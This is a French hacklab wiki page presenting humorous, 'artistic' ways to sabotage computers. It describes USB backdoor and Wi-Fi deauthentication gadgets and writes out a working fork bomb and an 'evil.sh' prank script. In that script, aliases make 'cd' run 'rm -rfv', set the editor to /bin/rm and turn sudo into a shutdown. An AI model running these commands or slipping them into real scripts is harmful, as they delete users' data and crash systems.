Computer-b-gone

Ou comment altérer le fonctionnement d'un ordinateur de façon malicieuse :)

Les ordinateurs étant susceptibles un jour ou l'autre d'échapper à notre contrôle, il peut être utile de connaître quelques façons de contrevenir à leur bon fonctionnement

Ce projet a des vocations avant tout artistiques et humoristiques, il convient de ne JAMAIS maltraiter un ordinateur qui ne vous appartient pas, et de CONSIDÉRER le coût environnemental de productions de ces appareils afin de tenter de les utiliser le plus longtemps possible

Bon, bien sur il est toujours possible de maltraiter physiquement un ordinateur …

peterlesplombs01.jpg

Relier le + et le - sur un port USB femelle …

ASCII���User comments

teensy_2.jpg

USBdriveby is a device you stylishly wear around your neck which can quickly and covertly install a backdoor and override DNS settings on an unlocked machine via USB in a matter of seconds. It does this by emulating a keyboard and mouse, blindly typing controlled commands, flailing the mouse pointer around and weaponizing mouse clicks.

“FANGo” is a defense weapon against surveillance capitalism. Hidden under its appearance of mobile phone charger will be provided with a micro controller that takes control of the smartphone plugged in making queries to google, amazon and other search engines, launching videos in YouTube in order to deceive data brokers in their data capture process. http://martinnadal.eu/fango/

Là aussi, il y a toute la cohorte des virus programmés à mauvais escient, on s'intéressera plutôt aux créations artistiques et astucieuses

Voir le projet ESP8266 Deauther 2.0 https://github.com/spacehuhn/esp8266_deauther basée sur le mini serveur ESP8266 qui tient dans la poche. La liste des appareils compatibles On peut installer les programmes via l'IDE d'Arduino ou acheter une version pré-fabriquée avec de chouettes options comme l'écran LCD intégré, voir https://dstike.com et https://maltronics.com/ et d'autres “gadgets” chez https://shop.hak5.org/products/

Voir la page wiki dédiée pour l'installation et l'utilisation

La fork bomb est une attaque à l'encontre d'un système informatique qui consiste à multiplier les programmes informatiques exécutés simultanément sur celui-ci, selon le principe qu'un processus parent donne naissance à un processus enfant qui lui-même devient parent … jusqu'à l'agonie de l'ordinateur du fait de la surcharge

Une de mes préférées :

:(){ :|:& };:

Comment rendre un utilisateur fou en altérant les fonctions de base de l'ordinateur : on répond “non” et l'ordinateur fait “oui” par exemple

#!/usr/bin/env bash
# evil.sh — https://mths.be/evil.sh
 
# Set `rm` as the default editor.
export EDITOR=/bin/rm;
 
# Make Tab send the delete key.
tset -Qe $'\t';
 
# Randomly make the shell exit whenever a command has a non-zero exit status.
((RANDOM % 10)) || set -o errexit;
 
# Let `cat` swallow every input and never return anything.
alias cat=true;
 
# Use a random sort option whenever `ls` is invoked.
function ls { command ls -$(opts="frStu"; echo ${opts:$((RANDOM % ${#opts})):1}) "$@"; }
 
# Delete directories instead of entering them.
alias cd='rm -rfv';
 
# Shut down the computer instead of running a command with super-user rights.
alias sudo='sudo shutdown -P now';

  • computer-b-gone.txt
  • Dernière modification: 2019/11/22 17:18
  • par Benjamin Labomedia